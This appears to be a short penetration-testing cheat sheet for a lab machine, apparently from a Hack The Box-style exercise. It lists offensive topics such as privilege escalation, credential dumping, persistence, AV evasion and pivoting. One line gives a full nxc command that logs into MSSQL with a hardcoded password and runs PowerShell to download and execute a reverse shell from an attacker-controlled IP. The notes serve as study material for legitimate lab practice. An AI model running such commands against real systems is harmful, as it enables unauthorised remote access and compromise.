CHECK STABLE FOR STABLE SHELL
### some esstential stuff ###
# Using nxc to download and run a reverse shell
nxc mssql dc01.sequel.htb -u sa -p 'MSSQLP@ssw0rd!' --local-auth -X 'IEX(New-Object Net.WebClient).downloadString("<http://10.10.14.8:8000/shell.ps1>")'
cmedb => hosts => creds
https://attack.mitre.org
- Meterpreter (help|screenshot) (u can run exploit local suggester modules within the meterpreter)
ACTIVE DIRECTORY! (cmedb)
Windows Priv Esc (cd C:\Temp | C:\Users\Public)
Linux Priv Esc (check msf as well)
- Linux Enum
- File transfer (nix)
- Linux Credentials Dumping (hashes)
- Non-interactive ⇒ interactive-shell
- Persistence connection
- msfvenom (if conection is immediatly lost, siwtch to bind shell)
- Reverse shells cheatsheet
- Webshells && linux commands injection
- AV evasion
- Hash cracking (run outside VM)
- Pivoting